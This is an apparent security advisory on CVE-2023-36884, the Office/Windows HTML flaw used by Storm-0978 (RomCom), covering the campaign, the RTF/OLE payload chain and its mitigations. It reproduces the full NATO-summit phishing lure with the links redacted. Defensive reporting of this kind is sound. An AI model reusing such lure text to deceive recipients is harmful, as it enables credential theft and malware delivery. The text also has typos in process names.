How (not) to get hacked in MS office - the latest MS Office Phishing and Exploit Campaign
Take action: As always, if a message is unexpected and either urgent, too good to be true or triggers some emotion, don't trust it. Definitely don't open anything in the message - link or file.
Learn More
A critical security vulnerability, designated as CVE-2023-36884, has recently been reported in Microsoft Office and Windows HTML. This vulnerability enables hackers to execute remote code on targeted systems.
A well known criminal group known as 'STORM-0978' or RomCom/DEV-0978, has been observed taking advantage of this vulnerability. Their focus lies in targeting defense and government organizations across North America and Europe, delivering a unique set of malware tools, which includes the RomCom malware and Underground Ransomware.
Campaign Overview
In July 2023, Microsoft officially acknowledged the existence of CVE-2023-36884, but the patch is still pending. Microsoft advised a workaround until the parch is available. All it takes for the exploit to work is a user to execute an exploit program in their MS Office.
The hacker groups STORM-0978 took advantage of the relative simplicity of attack and launched a phishing campaign. They are using a malicious Word document as the attack vector sent in a phishing email message.
According to CERT-UA, Storm-0978 compromised a Ukrainian Ministry of Defense email account to send phishing emails. Identified lure PDFs attached to emails contained links to a threat actor-controlled website hosting information-stealing malware. Here is an example of the message, with intentionally corrupted URL links.
Dear Ladies and Gentlemen,
On behalf of Ukrainian World Congress, please find the invitation letter for the NATO Summit. The summit will take place in Vilnius, Lithuania from 11th till 12th July 2023.
Given that Ukraine's victory will not be possible without strong, consistent military, financial and political support from NATO member states, we call on all Ukrainians and friends of Ukraine to send letters to NATO countries' governments or forward it to us.
You should review the Overview sheet and Letter form. Please fill out the letter form to support Ukraine and its people.
Updated version of files you can find below.
Overview:
Letter form:
https://www.redacted_link.info/redacted_path/Overview of UWCsUkrainelnNATOcampaign.doc
https://www.redacted_link.info/redacted_path//Letter NATO Summit Vilnius 2023 ENG.doc
Support Ukraine on its Euro-Atlantic path!
Sincerely yours,
Communications Manager
Once opened, the document triggers a series of unexpected child processes, such as mshta.exe, splwow64.4xe, powershell.exe, or cmd.exe.
Technical Details
The phishing campaign orchestrated by STORM-0978 utilizes a meticulously crafted Microsoft Office document to initiate the download of a malicious payload onto the victim's system. This payload often includes a backdoor akin to the RomCom malware. Notably, the exploit leverages RTF (Rich Text Format) exploitation, facilitating an outbound connection that downloads OLE (Object Linking & Embedding) streams into the Office application, thereby deploying the RomCom backdoor.
Taking Technical Action Against CVE-2023-36884
To safeguard against the exploitation of CVE-2023-36884, Microsoft advises users to enable the "Block all Office applications from creating child processes" rule until official patches become available. This measure effectively thwarts the vulnerability from being exploited.
Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884. In addition, customers who use Microsoft 365 Apps (Versions 2302 and later) are protected from exploitation of the vulnerability via Office.
Organizations who cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation. No OS restart is required, but restarting the applications that have had the registry key added for them is recommended in case the value was already queried and is cached.
Please note that while these registry settings would mitigate exploitation of this issue, it could affect regular functionality for certain use cases related to these applications. For this reason, we suggest testing. To disable the mitigation, delete the registry key or set it to “0”.
Taking Human Action Against CVE-2023-36884
The same rules for any other phishing campaign apply: It you are not expecting an email, the email asks for some urgency or triggers emotions in you (positive or negative) and asks you to take some action: Stop, think about the email and consult with your security team.
